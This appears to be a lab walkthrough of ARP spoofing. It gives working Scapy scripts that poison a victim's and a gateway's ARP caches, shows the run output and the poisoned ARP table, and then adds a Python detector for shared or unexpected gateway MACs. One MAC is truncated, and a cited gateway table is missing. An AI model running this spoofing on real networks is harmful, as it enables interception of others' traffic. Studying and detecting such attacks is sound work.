Attacker IP: 192.168.0.112 MAC: 00:0c:29:ab:27:ff
Victim IP: 192.168.0.104 MAC: 00:23:14:ad:36:c0
Gateway IP: 192.168.0.1 MAC: 9c:21:6a:4f:cc:38
Script file a.py
Spoofs host 192.168.0.104, telling it that the gateway's MAC address is the attacker's MAC.
#!/usr/bin/env python
from scapy.all import *
srloop(ARP(hwsrc='00:0c:29:ab:27:ff',hwdst='00:23:14:ad:36:c0',psrc='192.168.0.1',pdst='192.168.0.104'))
Script file b.py
Spoofs the gateway 192.168.0.1, telling it that the MAC address of 192.168.0.104 is the attacker's MAC.
#!/usr/bin/env python
from scapy.all import *
srloop(ARP(hwsrc='00:0c:29:ab:27:ff',hwdst='9c:21:6a:4f:cc:38',psrc='192.168.0.104',pdst='192.168.0.1'))
Run the two scripts separately:
root@kali:/dd/shell# python a.py
WARNING: No route found for IPv6 destination :: (no default route?)
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
RECV 1: ARP is at 00:23:14:ad:36:c0 says 192.168.0.104 / Padding
root@kali:/dd/shell# python b.py
WARNING: No route found for IPv6 destination :: (no default route?)
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
RECV 1: ARP is at 9c:21:6a:4f:cc:38 says 192.168.0.1 / Padding
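At this point the victim's ARP table looks as follows. The entry for the gateway 192.168.0.1 has the same MAC address as the attacker 192.168.0.112, which shows that the spoofing succeeded.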
C:\Users\Administrator>arp -a
接口: 192.168.0.104 --- 0xd
Internet 地址 物理地址 类型
192.168.0.1 00-0c-29-ab-27-ff 动态
192.168.0.80 00-14-6a-89-69-80 动态
192.168.0.100 5c-f9-38-39-9c-73 动态
192.168.0.112 00-0c-29-ab-27-f 动态
192.168.0.113 b8-27-eb-5d-b5-63 动态
192.168.0.210 84-2b-2b-b7-67-de 动态
192.168.0.230 00-25-b3-0b-a1-49 动态
192.168.0.255 ff-ff-ff-ff-ff-ff 静态
224.0.0.2 01-00-5e-00-00-02 静态
224.0.0.22 01-00-5e-00-00-16 静态
224.0.0.251 01-00-5e-00-00-fb 静态
224.0.0.252 01-00-5e-00-00-fc 静态
239.255.255.250 01-00-5e-7f-ff-fa 静态
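Now look at the gateway's ARP table: the entries for 192.168.0.112 and 192.168.0.104 have the same MAC address, which shows that the spoofing succeeded.
At this point, the attacker has successfully spoofed both directions.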
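The indicator described above (the gateway's ARP entry carrying the same MAC as another host) can be checked automatically. The following is an added example, not code from the original page: the function names are hypothetical, and the sample table is constructed from the addresses listed at the top of the page in the `arp -a` layout shown above.

```python
import re
from collections import defaultdict

# Constructed sample: `arp -a` output in the layout shown above, using the page's addresses.
SAMPLE = """\
接口: 192.168.0.104 --- 0xd
  Internet 地址         物理地址              类型
  192.168.0.1           00-0c-29-ab-27-ff     动态
  192.168.0.80          00-14-6a-89-69-80     动态
  192.168.0.112         00-0c-29-ab-27-ff     动态
  192.168.0.255         ff-ff-ff-ff-ff-ff     静态
  224.0.0.2             01-00-5e-00-00-02     静态
"""

ENTRY = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-fA-F]{2}[-:]){5}[0-9a-fA-F]{2})\b")

def parse_arp_table(text):
    """Return {ip: mac} with MACs normalised to lower-case colon form."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)  # header lines and malformed MACs do not match
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table

def is_unicast(mac):
    # Broadcast and multicast MACs have the low bit of the first octet set.
    return int(mac[:2], 16) & 1 == 0

def shared_macs(table):
    """Return {mac: [ips]} for every unicast MAC claimed by more than one IP."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        if is_unicast(mac):
            by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_alert(table, gateway_ip, known_gateway_mac=None):
    """Describe why the gateway entry looks poisoned, or return None."""
    mac = table.get(gateway_ip)
    if mac is None:
        return None
    if known_gateway_mac and mac != known_gateway_mac.lower().replace("-", ":"):
        return f"{gateway_ip} maps to {mac}, expected {known_gateway_mac}"
    others = [ip for ip in shared_macs(table).get(mac, []) if ip != gateway_ip]
    if others:
        return f"{gateway_ip} shares MAC {mac} with {', '.join(others)}"
    return None

if __name__ == "__main__":
    print(gateway_alert(parse_arp_table(SAMPLE), "192.168.0.1", "9c:21:6a:4f:cc:38"))
```

Passing the gateway's known-good MAC catches the poisoned entry even when the attacker's own IP is absent from the table; without it, the check falls back to the duplicate-MAC comparison.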